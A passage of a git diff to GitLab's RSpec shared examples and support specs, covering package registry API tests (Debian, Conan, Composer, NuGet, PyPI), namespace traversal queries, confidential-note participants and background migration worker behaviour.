`tasks_to_be_done` and `tasks_project_id` are passed' do - before do - stub_experiments(invite_members_for_task: true) - end - it 'creates a member_task with the correct attributes', :aggregate_failures do task_project = source.is_a?(Group) ? create(:project, group: source) : source described_class.new(source, user, :developer, tasks_to_be_done: %w(ci code), tasks_project_id: task_project.id).execute @@ -397,10 +393,6 @@ RSpec.shared_examples_for "bulk member creation" do end context 'when `tasks_to_be_done` and `tasks_project_id` are passed' do - before do - stub_experiments(invite_members_for_task: true) - end - it 'creates a member_task with the correct attributes', :aggregate_failures do task_project = source.is_a?(Group) ? create(:project, group: source) : source members = described_class.add_users(source, [user1], :developer, tasks_to_be_done: %w(ci code), tasks_project_id: task_project.id) diff --git a/spec/support/shared_examples/models/packages/debian/component_file_shared_example.rb b/spec/support/shared_examples/models/packages/debian/component_file_shared_example.rb index f08ee820463..23026167b19 100644 --- a/spec/support/shared_examples/models/packages/debian/component_file_shared_example.rb +++ b/spec/support/shared_examples/models/packages/debian/component_file_shared_example.rb @@ -23,7 +23,7 @@ RSpec.shared_examples 'Debian Component File' do |container_type, can_freeze| let_it_be(:component_file_other_file_md5, freeze: can_freeze) { create("debian_#{container_type}_component_file", component: component1_1, architecture: architecture1_1, file_md5: 'other_md5') } let_it_be(:component_file_other_file_sha256, freeze: can_freeze) { create("debian_#{container_type}_component_file", component: component1_1, architecture: architecture1_1, file_sha256: 'other_sha256') } let_it_be(:component_file_other_container, freeze: can_freeze) { create("debian_#{container_type}_component_file", component: component2_1, architecture: architecture2_1) } - let_it_be_with_refind(:component_file_with_file_type_source) { create("debian_#{container_type}_component_file", :source, component: component1_1) } + let_it_be_with_refind(:component_file_with_file_type_sources) { create("debian_#{container_type}_component_file", :sources, component: component1_1) } let_it_be(:component_file_with_file_type_di_packages, freeze: can_freeze) { create("debian_#{container_type}_component_file", :di_packages, component: component1_1, architecture: architecture1_1) } subject { component_file_with_architecture } @@ -43,8 +43,8 @@ RSpec.shared_examples 'Debian Component File' do |container_type, can_freeze| it { is_expected.to belong_to(:architecture).class_name("Packages::Debian::#{container_type.capitalize}Architecture").inverse_of(:files) } end - context 'with :source file_type' do - subject { component_file_with_file_type_source } + context 'with :sources file_type' do + subject { component_file_with_file_type_sources } it { is_expected.to belong_to(:architecture).class_name("Packages::Debian::#{container_type.capitalize}Architecture").inverse_of(:files).optional } end @@ -66,8 +66,8 @@ RSpec.shared_examples 'Debian Component File' do |container_type, can_freeze| it { is_expected.to validate_presence_of(:architecture) } end - context 'with :source file_type' do - subject { component_file_with_file_type_source } + context 'with :sources file_type' do + subject { component_file_with_file_type_sources } it { is_expected.to validate_absence_of(:architecture) } end @@ -135,10 +135,10 @@ RSpec.shared_examples 'Debian Component File' do |container_type, can_freeze| end describe '.with_file_type' do - subject { described_class.with_file_type(:source) } + subject { described_class.with_file_type(:sources) } it do - expect(subject.to_a).to contain_exactly(component_file_with_file_type_source) + expect(subject.to_a).to contain_exactly(component_file_with_file_type_sources) end end @@ -214,9 +214,9 @@ RSpec.shared_examples 'Debian Component File' do |container_type, can_freeze| end context 'with a Source file_type' do - subject { component_file_with_file_type_source.relative_path } + subject { component_file_with_file_type_sources.relative_path } - it { is_expected.to eq("#{component1_1.name}/source/Source") } + it { is_expected.to eq("#{component1_1.name}/source/Sources") } end context 'with a DI Packages file_type' do diff --git a/spec/support/shared_examples/namespaces/traversal_examples.rb b/spec/support/shared_examples/namespaces/traversal_examples.rb index ac6a843663f..73e22b97abc 100644 --- a/spec/support/shared_examples/namespaces/traversal_examples.rb +++ b/spec/support/shared_examples/namespaces/traversal_examples.rb @@ -205,6 +205,58 @@ RSpec.shared_examples 'namespace traversal' do end end + shared_examples '#ancestors_upto' do + let(:parent) { create(:group) } + let(:child) { create(:group, parent: parent) } + let(:child2) { create(:group, parent: child) } + + it 'returns all ancestors when no namespace is given' do + expect(child2.ancestors_upto).to contain_exactly(child, parent) + end + + it 'includes ancestors upto but excluding the given ancestor' do + expect(child2.ancestors_upto(parent)).to contain_exactly(child) + end + + context 'with asc hierarchy_order' do + it 'returns the correct ancestor ids' do + expect(child2.ancestors_upto(hierarchy_order: :asc)).to eq([child, parent]) + end + end + + context 'with desc hierarchy_order' do + it 'returns the correct ancestor ids' do + expect(child2.ancestors_upto(hierarchy_order: :desc)).to eq([parent, child]) + end + end + + describe '#recursive_self_and_ancestor_ids' do + it 'is equivalent to ancestors_upto' do + recursive_result = child2.recursive_ancestors_upto(parent) + linear_result = child2.ancestors_upto(parent) + expect(linear_result).to match_array recursive_result + end + + it 'makes a recursive query' do + expect { child2.recursive_ancestors_upto.try(:load) }.to make_queries_matching(/WITH RECURSIVE/) + end + end + end + + describe '#ancestors_upto' do + context 'with use_traversal_ids_for_ancestors_upto enabled' do + include_examples '#ancestors_upto' + end + + context 'with use_traversal_ids_for_ancestors_upto disabled' do + before do + stub_feature_flags(use_traversal_ids_for_ancestors_upto: false) + end + + include_examples '#ancestors_upto' + end + end + describe '#descendants' do let!(:another_group) { create(:group) } let!(:another_group_nested) { create(:group, parent: another_group) } diff --git a/spec/support/shared_examples/namespaces/traversal_scope_examples.rb b/spec/support/shared_examples/namespaces/traversal_scope_examples.rb index 4c09c1c2a3b..3d52ed30c62 100644 --- a/spec/support/shared_examples/namespaces/traversal_scope_examples.rb +++ b/spec/support/shared_examples/namespaces/traversal_scope_examples.rb @@ -213,6 +213,12 @@ RSpec.shared_examples 'namespace traversal scopes' do it { is_expected.to contain_exactly(deep_nested_group_1, deep_nested_group_2) } end + + context 'with offset and limit' do + subject { described_class.where(id: [group_1, group_2]).offset(1).limit(1).self_and_descendants } + + it { is_expected.to contain_exactly(group_2, nested_group_2, deep_nested_group_2) } + end end describe '.self_and_descendants' do @@ -242,6 +248,19 @@ RSpec.shared_examples 'namespace traversal scopes' do it { is_expected.to contain_exactly(deep_nested_group_1.id, deep_nested_group_2.id) } end + + context 'with offset and limit' do + subject do + described_class + .where(id: [group_1, group_2]) + .limit(1) + .offset(1) + .self_and_descendant_ids + .pluck(:id) + end + + it { is_expected.to contain_exactly(group_2.id, nested_group_2.id, deep_nested_group_2.id) } + end end describe '.self_and_descendant_ids' do diff --git a/spec/support/shared_examples/requests/api/composer_packages_shared_examples.rb b/spec/support/shared_examples/requests/api/composer_packages_shared_examples.rb index e45be21f152..9f4fdcf7ba1 100644 --- a/spec/support/shared_examples/requests/api/composer_packages_shared_examples.rb +++ b/spec/support/shared_examples/requests/api/composer_packages_shared_examples.rb @@ -173,3 +173,65 @@ RSpec.shared_examples 'rejects Composer access with unknown project id' do end end end + +RSpec.shared_examples 'Composer access with deploy tokens' do + shared_examples 'a deploy token for Composer GET requests' do + context 'with deploy token headers' do + let(:headers) { basic_auth_header(deploy_token.username, deploy_token.token) } + + before do + group.update!(visibility_level: Gitlab::VisibilityLevel::PRIVATE) + end + + context 'valid token' do + it_behaves_like 'returning response status', :success + end + + context 'invalid token' do + let(:headers) { basic_auth_header(deploy_token.username, 'bar') } + + it_behaves_like 'returning response status', :not_found + end + end + end + + context 'group deploy token' do + let(:deploy_token) { deploy_token_for_group } + + it_behaves_like 'a deploy token for Composer GET requests' + end + + context 'project deploy token' do + let(:deploy_token) { deploy_token_for_project } + + it_behaves_like 'a deploy token for Composer GET requests' + end +end + +RSpec.shared_examples 'Composer publish with deploy tokens' do + shared_examples 'a deploy token for Composer publish requests' do + let(:headers) { basic_auth_header(deploy_token.username, deploy_token.token) } + + context 'valid token' do + it_behaves_like 'returning response status', :success + end + + context 'invalid token' do + let(:headers) { basic_auth_header(deploy_token.username, 'bar') } + + it_behaves_like 'returning response status', :unauthorized + end + end + + context 'group deploy token' do + let(:deploy_token) { deploy_token_for_group } + + it_behaves_like 'a deploy token for Composer publish requests' + end + + context 'group deploy token' do + let(:deploy_token) { deploy_token_for_project } + + it_behaves_like 'a deploy token for Composer publish requests' + end +end diff --git a/spec/support/shared_examples/requests/api/conan_packages_shared_examples.rb b/spec/support/shared_examples/requests/api/conan_packages_shared_examples.rb index 20606ae942d..71f3a0235be 100644 --- a/spec/support/shared_examples/requests/api/conan_packages_shared_examples.rb +++ b/spec/support/shared_examples/requests/api/conan_packages_shared_examples.rb @@ -178,6 +178,54 @@ RSpec.shared_examples 'rejects invalid recipe' do end end +RSpec.shared_examples 'handling empty values for username and channel' do + using RSpec::Parameterized::TableSyntax + + let(:recipe_path) { "#{package.name}/#{package.version}/#{package_username}/#{channel}" } + + where(:username, :channel, :status) do + 'username' | 'channel' | :ok + 'username' | '_' | :bad_request + '_' | 'channel' | :bad_request_or_not_found + '_' | '_' | :ok_or_not_found + end + + with_them do + let(:package_username) do + if username == 'username' + package.conan_metadatum.package_username + else + username + end + end + + before do + project.add_maintainer(user) # avoid any permission issue + end + + it 'returns the correct status code' do |example| + project_level = example.full_description.include?('api/v4/projects') + + expected_status = case status + when :ok_or_not_found + project_level ? :ok : :not_found + when :bad_request_or_not_found + project_level ? :bad_request : :not_found + else + status + end + + if expected_status == :ok + package.conan_metadatum.update!(package_username: package_username, package_channel: channel) + end + + subject + + expect(response).to have_gitlab_http_status(expected_status) + end + end +end + RSpec.shared_examples 'rejects invalid file_name' do |invalid_file_name| let(:file_name) { invalid_file_name } @@ -300,6 +348,7 @@ RSpec.shared_examples 'recipe snapshot endpoint' do it_behaves_like 'rejects invalid recipe' it_behaves_like 'rejects recipe for invalid project' it_behaves_like 'empty recipe for not found package' + it_behaves_like 'handling empty values for username and channel' context 'with existing package' do it 'returns a hash of files with their md5 hashes' do @@ -324,6 +373,7 @@ RSpec.shared_examples 'package snapshot endpoint' do it_behaves_like 'rejects invalid recipe' it_behaves_like 'rejects recipe for invalid project' it_behaves_like 'empty recipe for not found package' + it_behaves_like 'handling empty values for username and channel' context 'with existing package' do it 'returns a hash of md5 values for the files' do @@ -344,12 +394,14 @@ RSpec.shared_examples 'recipe download_urls endpoint' do it_behaves_like 'rejects invalid recipe' it_behaves_like 'rejects recipe for invalid project' it_behaves_like 'recipe download_urls' + it_behaves_like 'handling empty values for username and channel' end RSpec.shared_examples 'package download_urls endpoint' do it_behaves_like 'rejects invalid recipe' it_behaves_like 'rejects recipe for invalid project' it_behaves_like 'package download_urls' + it_behaves_like 'handling empty values for username and channel' end RSpec.shared_examples 'recipe upload_urls endpoint' do @@ -362,6 +414,7 @@ RSpec.shared_examples 'recipe upload_urls endpoint' do it_behaves_like 'rejects invalid recipe' it_behaves_like 'rejects invalid upload_url params' + it_behaves_like 'handling empty values for username and channel' it 'returns a set of upload urls for the files requested' do subject @@ -423,6 +476,7 @@ RSpec.shared_examples 'package upload_urls endpoint' do it_behaves_like 'rejects invalid recipe' it_behaves_like 'rejects invalid upload_url params' + it_behaves_like 'handling empty values for username and channel' it 'returns a set of upload urls for the files requested' do expected_response = { @@ -458,6 +512,7 @@ RSpec.shared_examples 'delete package endpoint' do let(:recipe_path) { package.conan_recipe_path } it_behaves_like 'rejects invalid recipe' + it_behaves_like 'handling empty values for username and channel' it 'returns unauthorized for users without valid permission' do subject @@ -568,12 +623,14 @@ RSpec.shared_examples 'recipe file download endpoint' do it_behaves_like 'a public project with packages' it_behaves_like 'an internal project with packages' it_behaves_like 'a private project with packages' + it_behaves_like 'handling empty values for username and channel' end RSpec.shared_examples 'package file download endpoint' do it_behaves_like 'a public project with packages' it_behaves_like 'an internal project with packages' it_behaves_like 'a private project with packages' + it_behaves_like 'handling empty values for username and channel' context 'tracking the conan_package.tgz download' do let(:package_file) { package.package_files.find_by(file_name: ::Packages::Conan::FileMetadatum::PACKAGE_BINARY) } @@ -598,6 +655,7 @@ RSpec.shared_examples 'workhorse authorize endpoint' do it_behaves_like 'rejects invalid recipe' it_behaves_like 'rejects invalid file_name', 'conanfile.py.git%2fgit-upload-pack' it_behaves_like 'workhorse authorization' + it_behaves_like 'handling empty values for username and channel' end RSpec.shared_examples 'workhorse recipe file upload endpoint' do @@ -619,6 +677,7 @@ RSpec.shared_examples 'workhorse recipe file upload endpoint' do it_behaves_like 'rejects invalid file_name', 'conanfile.py.git%2fgit-upload-pack' it_behaves_like 'uploads a package file' it_behaves_like 'creates build_info when there is a job' + it_behaves_like 'handling empty values for username and channel' end RSpec.shared_examples 'workhorse package file upload endpoint' do @@ -640,6 +699,7 @@ RSpec.shared_examples 'workhorse package file upload endpoint' do it_behaves_like 'rejects invalid file_name', 'conaninfo.txttest' it_behaves_like 'uploads a package file' it_behaves_like 'creates build_info when there is a job' + it_behaves_like 'handling empty values for username and channel' context 'tracking the conan_package.tgz upload' do let(:file_name) { ::Packages::Conan::FileMetadatum::PACKAGE_BINARY } diff --git a/spec/support/shared_examples/requests/api/graphql/mutations/snippets_shared_examples.rb b/spec/support/shared_examples/requests/api/graphql/mutations/snippets_shared_examples.rb index 62dbac3fd4d..8bffd1f71e9 100644 --- a/spec/support/shared_examples/requests/api/graphql/mutations/snippets_shared_examples.rb +++ b/spec/support/shared_examples/requests/api/graphql/mutations/snippets_shared_examples.rb @@ -18,19 +18,19 @@ RSpec.shared_examples 'snippet edit usage data counters' do end end - context 'when user is not sessionless' do + context 'when user is not sessionless', :clean_gitlab_redis_sessions do before do session_id = Rack::Session::SessionId.new('6919a6f1bb119dd7396fadc38fd18d0d') session_hash = { 'warden.user.user.key' => [[current_user.id], current_user.encrypted_password[0, 29]] } - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.set("session:gitlab:#{session_id.private_id}", Marshal.dump(session_hash)) end cookies[Gitlab::Application.config.session_options[:key]] = session_id.public_id end - it 'tracks usage data actions', :clean_gitlab_redis_shared_state do + it 'tracks usage data actions', :clean_gitlab_redis_sessions do expect(::Gitlab::UsageDataCounters::EditorUniqueCounter).to receive(:track_snippet_editor_edit_action) post_graphql_mutation(mutation) diff --git a/spec/support/shared_examples/requests/api/graphql/packages/group_and_project_packages_list_shared_examples.rb b/spec/support/shared_examples/requests/api/graphql/packages/group_and_project_packages_list_shared_examples.rb index 367c6d4fa3a..882c79cb03f 100644 --- a/spec/support/shared_examples/requests/api/graphql/packages/group_and_project_packages_list_shared_examples.rb +++ b/spec/support/shared_examples/requests/api/graphql/packages/group_and_project_packages_list_shared_examples.rb @@ -55,7 +55,7 @@ RSpec.shared_examples 'group and project packages query' do end it 'deals with metadata' do - expect(target_shas).to contain_exactly(composer_metadatum.target_sha) + expect(target_shas.compact).to contain_exactly(composer_metadatum.target_sha) end it 'returns the count of the packages' do diff --git a/spec/support/shared_examples/requests/api/issuable_participants_examples.rb b/spec/support/shared_examples/requests/api/issuable_participants_examples.rb index 673d7741017..c5e5803c0a7 100644 --- a/spec/support/shared_examples/requests/api/issuable_participants_examples.rb +++ b/spec/support/shared_examples/requests/api/issuable_participants_examples.rb @@ -28,4 +28,34 @@ RSpec.shared_examples 'issuable participants endpoint' do expect(response).to have_gitlab_http_status(:not_found) end + + context 'with a confidential note' do + let!(:note) do + create( + :note, + :confidential, + project: project, + noteable: entity, + author: create(:user) + ) + end + + it 'returns a full list of participants' do + get api("/projects/#{project.id}/#{area}/#{entity.iid}/participants", user) + + expect(response).to have_gitlab_http_status(:ok) + participant_ids = json_response.map { |el| el['id'] } + expect(participant_ids).to match_array([entity.author_id, note.author_id]) + end + + context 'when user cannot see a confidential note' do + it 'returns a limited list of participants' do + get api("/projects/#{project.id}/#{area}/#{entity.iid}/participants", create(:user)) + + expect(response).to have_gitlab_http_status(:ok) + participant_ids = json_response.map { |el| el['id'] } + expect(participant_ids).to match_array([entity.author_id]) + end + end + end end diff --git a/spec/support/shared_examples/requests/api/npm_packages_shared_examples.rb b/spec/support/shared_examples/requests/api/npm_packages_shared_examples.rb index 19677e92001..8d6d85732be 100644 --- a/spec/support/shared_examples/requests/api/npm_packages_shared_examples.rb +++ b/spec/support/shared_examples/requests/api/npm_packages_shared_examples.rb @@ -41,19 +41,6 @@ RSpec.shared_examples 'handling get metadata requests' do |scope: :project| # query count can slightly change between the examples so we're using a custom threshold expect { get(url, headers: headers) }.not_to exceed_query_limit(control).with_threshold(4) end - - context 'with packages_npm_abbreviated_metadata disabled' do - before do - stub_feature_flags(packages_npm_abbreviated_metadata: false) - end - - it 'calls the presenter without including metadata' do - expect(::Packages::Npm::PackagePresenter) - .to receive(:new).with(anything, anything, include_metadata: false).and_call_original - - subject - end - end end shared_examples 'reject metadata request' do |status:| diff --git a/spec/support/shared_examples/requests/api/nuget_packages_shared_examples.rb b/spec/support/shared_examples/requests/api/nuget_packages_shared_examples.rb index 878cbc10a24..6568d51b90e 100644 --- a/spec/support/shared_examples/requests/api/nuget_packages_shared_examples.rb +++ b/spec/support/shared_examples/requests/api/nuget_packages_shared_examples.rb @@ -391,7 +391,7 @@ RSpec.shared_examples 'rejects nuget access with invalid target id' do context 'with a target id with invalid integers' do using RSpec::Parameterized::TableSyntax - let(:target) { OpenStruct.new(id: id) } + let(:target) { double(id: id) } where(:id, :status) do '/../' | :bad_request @@ -411,7 +411,7 @@ end RSpec.shared_examples 'rejects nuget access with unknown target id' do context 'with an unknown target' do - let(:target) { OpenStruct.new(id: 1234567890) } + let(:target) { double(id: 1234567890) } context 'as anonymous' do it_behaves_like 'rejects nuget packages access', :anonymous, :unauthorized diff --git a/spec/support/shared_examples/requests/api/pypi_packages_shared_examples.rb b/spec/support/shared_examples/requests/api/pypi_packages_shared_examples.rb index 06c51add438..aff086d1ba3 100644 --- a/spec/support/shared_examples/requests/api/pypi_packages_shared_examples.rb +++ b/spec/support/shared_examples/requests/api/pypi_packages_shared_examples.rb @@ -346,7 +346,8 @@ RSpec.shared_examples 'a pypi user namespace endpoint' do end with_them do - let_it_be_with_reload(:group) { create(:namespace) } + # only groups are supported, so this "group" is actually the wrong namespace type + let_it_be_with_reload(:group) { create(:user_namespace) } let(:headers) { user_role == :anonymous ? {} : basic_auth_header(user.username, personal_access_token.token) } before do diff --git a/spec/support/shared_examples/services/packages/debian/generate_distribution_shared_examples.rb b/spec/support/shared_examples/services/packages/debian/generate_distribution_shared_examples.rb index c979fdc2bb0..7fd20fc3909 100644 --- a/spec/support/shared_examples/services/packages/debian/generate_distribution_shared_examples.rb +++ b/spec/support/shared_examples/services/packages/debian/generate_distribution_shared_examples.rb @@ -126,7 +126,7 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do SHA256: #{package_files[4].file_sha256} EOF - expected_main_source_content = <<~EOF + expected_main_sources_content = <<~EOF Package: #{package.name} Binary: sample-dev, libsample0, sample-udeb Version: #{package.version} @@ -158,7 +158,7 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do check_component_file(current_time.round, 'main', :di_packages, 'amd64', expected_main_amd64_di_content) check_component_file(current_time.round, 'main', :di_packages, 'arm64', nil) - check_component_file(current_time.round, 'main', :source, nil, expected_main_source_content) + check_component_file(current_time.round, 'main', :sources, nil, expected_main_sources_content) check_component_file(current_time.round, 'contrib', :packages, 'all', nil) check_component_file(current_time.round, 'contrib', :packages, 'amd64', nil) @@ -168,7 +168,7 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do check_component_file(current_time.round, 'contrib', :di_packages, 'amd64', nil) check_component_file(current_time.round, 'contrib', :di_packages, 'arm64', nil) - check_component_file(current_time.round, 'contrib', :source, nil, nil) + check_component_file(current_time.round, 'contrib', :sources, nil, nil) main_amd64_size = expected_main_amd64_content.length main_amd64_md5sum = Digest::MD5.hexdigest(expected_main_amd64_content) @@ -182,9 +182,9 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do main_amd64_di_md5sum = Digest::MD5.hexdigest(expected_main_amd64_di_content) main_amd64_di_sha256 = Digest::SHA256.hexdigest(expected_main_amd64_di_content) - main_source_size = expected_main_source_content.length - main_source_md5sum = Digest::MD5.hexdigest(expected_main_source_content) - main_source_sha256 = Digest::SHA256.hexdigest(expected_main_source_content) + main_sources_size = expected_main_sources_content.length + main_sources_md5sum = Digest::MD5.hexdigest(expected_main_sources_content) + main_sources_sha256 = Digest::SHA256.hexdigest(expected_main_sources_content) expected_release_content = <<~EOF Codename: unstable @@ -199,14 +199,14 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do d41d8cd98f00b204e9800998ecf8427e 0 contrib/debian-installer/binary-amd64/Packages d41d8cd98f00b204e9800998ecf8427e 0 contrib/binary-arm64/Packages d41d8cd98f00b204e9800998ecf8427e 0 contrib/debian-installer/binary-arm64/Packages - d41d8cd98f00b204e9800998ecf8427e 0 contrib/source/Source + d41d8cd98f00b204e9800998ecf8427e 0 contrib/source/Sources d41d8cd98f00b204e9800998ecf8427e 0 main/binary-all/Packages d41d8cd98f00b204e9800998ecf8427e 0 main/debian-installer/binary-all/Packages #{main_amd64_md5sum} #{main_amd64_size} main/binary-amd64/Packages #{main_amd64_di_md5sum} #{main_amd64_di_size} main/debian-installer/binary-amd64/Packages d41d8cd98f00b204e9800998ecf8427e 0 main/binary-arm64/Packages d41d8cd98f00b204e9800998ecf8427e 0 main/debian-installer/binary-arm64/Packages - #{main_source_md5sum} #{main_source_size} main/source/Source + #{main_sources_md5sum} #{main_sources_size} main/source/Sources SHA256: #{contrib_all_sha256} #{contrib_all_size} contrib/binary-all/Packages e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 contrib/debian-installer/binary-all/Packages @@ -214,14 +214,14 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 contrib/debian-installer/binary-amd64/Packages e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 contrib/binary-arm64/Packages e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 contrib/debian-installer/binary-arm64/Packages - e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 contrib/source/Source + e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 contrib/source/Sources e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 main/binary-all/Packages e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 main/debian-installer/binary-all/Packages #{main_amd64_sha256} #{main_amd64_size} main/binary-amd64/Packages #{main_amd64_di_sha256} #{main_amd64_di_size} main/debian-installer/binary-amd64/Packages e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 main/binary-arm64/Packages e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 main/debian-installer/binary-arm64/Packages - #{main_source_sha256} #{main_source_size} main/source/Source + #{main_sources_sha256} #{main_sources_size} main/source/Sources EOF check_release_files(expected_release_content) diff --git a/spec/support/shared_examples/workers/background_migration_worker_shared_examples.rb b/spec/support/shared_examples/workers/background_migration_worker_shared_examples.rb new file mode 100644 index 00000000000..0d3e158d358 --- /dev/null +++ b/spec/support/shared_examples/workers/background_migration_worker_shared_examples.rb @@ -0,0 +1,212 @@ +# frozen_string_literal: true + +RSpec.shared_examples 'it runs background migration jobs' do |tracking_database, metric_name| + describe 'defining the job attributes' do + it 'defines the data_consistency as always' do + expect(described_class.get_data_consistency).to eq(:always) + end + + it 'defines the retry count in sidekiq_options' do + expect(described_class.sidekiq_options['retry']).to eq(3) + end + + it 'defines the feature_category as database' do + expect(described_class.get_feature_category).to eq(:database) + end + + it 'defines the urgency as throttled' do + expect(described_class.get_urgency).to eq(:throttled) + end + + it 'defines the loggable_arguments' do + expect(described_class.loggable_arguments).to match_array([0, 1]) + end + end + + describe '.tracking_database' do + it 'does not raise an error' do + expect { described_class.tracking_database }.not_to raise_error + end + + it 'overrides the method to return the tracking database' do + expect(described_class.tracking_database).to eq(tracking_database) + end + end + + describe '.unhealthy_metric_name' do + it 'does not raise an error' do + expect { described_class.unhealthy_metric_name }.not_to raise_error + end + + it 'overrides the method to return the unhealthy metric name' do + expect(described_class.unhealthy_metric_name).to eq(metric_name) + end + end + + describe '.minimum_interval' do + it 'returns 2 minutes' do + expect(described_class.minimum_interval).to eq(2.minutes.to_i) + end + end + + describe '#perform' do + let(:worker) { described_class.new } + + before do + allow(worker).to receive(:jid).and_return(1) + allow(worker).to receive(:always_perform?).and_return(false) + + allow(Postgresql::ReplicationSlot).to receive(:lag_too_great?).and_return(false) + end + + it 'performs jobs using the coordinator for the worker' do + expect_next_instance_of(Gitlab::BackgroundMigration::JobCoordinator) do |coordinator| + allow(coordinator).to receive(:with_shared_connection).and_yield + + expect(coordinator.worker_class).to eq(described_class) + expect(coordinator).to receive(:perform).with('Foo', [10, 20]) + end + + worker.perform('Foo', [10, 20]) + end + + context 'when lease can be obtained' do + let(:coordinator) { double('job coordinator') } + + before do + allow(Gitlab::BackgroundMigration).to receive(:coordinator_for_database) + .with(tracking_database) + .and_return(coordinator) + + allow(coordinator).to receive(:with_shared_connection).and_yield + end + + it 'sets up the shared connection before checking replication' do + expect(coordinator).to receive(:with_shared_connection).and_yield.ordered + expect(Postgresql::ReplicationSlot).to receive(:lag_too_great?).and_return(false).ordered + + expect(coordinator).to receive(:perform).with('Foo', [10, 20]) + + worker.perform('Foo', [10, 20]) + end + + it 'performs a background migration' do + expect(coordinator).to receive(:perform).with('Foo', [10, 20]) + + worker.perform('Foo', [10, 20]) + end + + context 'when lease_attempts is 1' do + it 'performs a background migration' do + expect(coordinator).to receive(:perform).with('Foo', [10, 20]) + + worker.perform('Foo', [10, 20], 1) + end + end + + it 'can run scheduled job and retried job concurrently' do + expect(coordinator) + .to receive(:perform) + .with('Foo', [10, 20]) + .exactly(2).time + + worker.perform('Foo', [10, 20]) + worker.perform('Foo', [10, 20], described_class::MAX_LEASE_ATTEMPTS - 1) + end + + it 'sets the class that will be executed as the caller_id' do + expect(coordinator).to receive(:perform) do + expect(Gitlab::ApplicationContext.current).to include('meta.caller_id' => 'Foo') + end + + worker.perform('Foo', [10, 20]) + end + end + + context 'when lease not obtained (migration of same class was performed recently)' do + let(:timeout) { described_class.minimum_interval } + let(:lease_key) { "#{described_class.name}:Foo" } + let(:coordinator) { double('job coordinator') } + + before do + allow(Gitlab::BackgroundMigration).to receive(:coordinator_for_database) + .with(tracking_database) + .and_return(coordinator) + + allow(coordinator).to receive(:with_shared_connection).and_yield + + expect(coordinator).not_to receive(:perform) + + Gitlab::ExclusiveLease.new(lease_key, timeout: timeout).try_obtain + end + + it 'reschedules the migration and decrements the lease_attempts' do + expect(described_class) + .to receive(:perform_in) + .with(a_kind_of(Numeric), 'Foo', [10, 20], 4) + + worker.perform('Foo', [10, 20], 5) + end + + context 'when lease_attempts is 1' do + let(:lease_key) { "#{described_class.name}:Foo:retried" } + + it 'reschedules the migration and decrements the lease_attempts' do + expect(described_class) + .to receive(:perform_in) + .with(a_kind_of(Numeric), 'Foo', [10, 20], 0) + + worker.perform('Foo', [10, 20], 1) + end + end + + context 'when lease_attempts is 0' do + let(:lease_key) { "#{described_class.name}:Foo:retried" } + + it 'gives up performing the migration' do + expect(described_class).not_to receive(:perform_in) + expect(Sidekiq.logger).to receive(:warn).with( + class: 'Foo', + message: 'Job could not get an exclusive lease after several tries. Giving up.', + job_id: 1) + + worker.perform('Foo', [10, 20], 0) + end + end + end + + context 'when database is not healthy' do + before do + expect(Postgresql::ReplicationSlot).to receive(:lag_too_great?).and_return(true) + end + + it 'reschedules a migration if the database is not healthy' do + expect(described_class) + .to receive(:perform_in) + .with(a_kind_of(Numeric), 'Foo', [10, 20], 4) + + worker.perform('Foo', [10, 20]) + end + + it 'increments the unhealthy counter' do + counter = Gitlab::Metrics.counter(metric_name, 'msg') + + expect(described_class).to receive(:perform_in) + + expect { worker.perform('Foo', [10, 20]) }.to change { counter.get }.by(1) + end + + context 'when lease_attempts is 0' do + it 'gives up performing the migration' do + expect(described_class).not_to receive(:perform_in) + expect(Sidekiq.logger).to receive(:warn).with( + class: 'Foo', + message: 'Database was unhealthy after several tries. Giving up.', + job_id: 1) + + worker.perform('Foo', [10, 20], 0) + end + end + end + end +end diff --git a/spec/support_specs/database/multiple_databases_spec.rb b/spec/support_specs/database/multiple_databases_spec.rb index 10d1a8277c6..a8692e315fe 100644 --- a/spec/support_specs/database/multiple_databases_spec.rb +++ b/spec/support_specs/database/multiple_databases_spec.rb @@ -56,4 +56,43 @@ RSpec.describe 'Database::MultipleDatabases' do end end end + + describe '.with_added_ci_connection' do + context 'when only a single database is setup' do + before do + skip_if_multiple_databases_are_setup + end + + it 'connects Ci::ApplicationRecord to the main database for the duration of the block', :aggregate_failures do + main_database = current_database(ActiveRecord::Base) + original_database = current_database(Ci::ApplicationRecord) + + with_added_ci_connection do + expect(current_database(Ci::ApplicationRecord)).to eq(main_database) + end + + expect(current_database(Ci::ApplicationRecord)).to eq(original_database) + end + end + + context 'when multiple databases are setup' do + before do + skip_if_multiple_databases_not_setup + end + + it 'does not mock the original Ci::ApplicationRecord connection', :aggregate_failures do + original_database = current_database(Ci::ApplicationRecord) + + with_added_ci_connection do + expect(current_database(Ci::ApplicationRecord)).to eq(original_database) + end + + expect(current_database(Ci::ApplicationRecord)).to eq(original_database) + end + end + + def current_database(connection_class) + connection_class.retrieve_connection.execute('select current_database()').first + end + end end diff --git a/spec/support_specs/database/prevent_cross_joins_spec.rb b/spec/support_specs/database/prevent_cross_joins_spec.rb index 0fbcd190c2c..efeabd15b58 100644 --- a/spec/support_specs/database/prevent_cross_joins_spec.rb +++ b/spec/support_specs/database/prevent_cross_joins_spec.rb @@ -39,6 +39,15 @@ RSpec.describe Database::PreventCrossJoins do expect { main_and_ci_query_allowlist_nested }.not_to raise_error end end + + context 'when there is a parser error' do + it 'does not raise parse PGQuery::ParseError' do + # Since this is in an invalid query it still raises from ActiveRecord + # but this tests that we rescue the PGQuery::ParseError which would + # have otherwise raised first + expect { 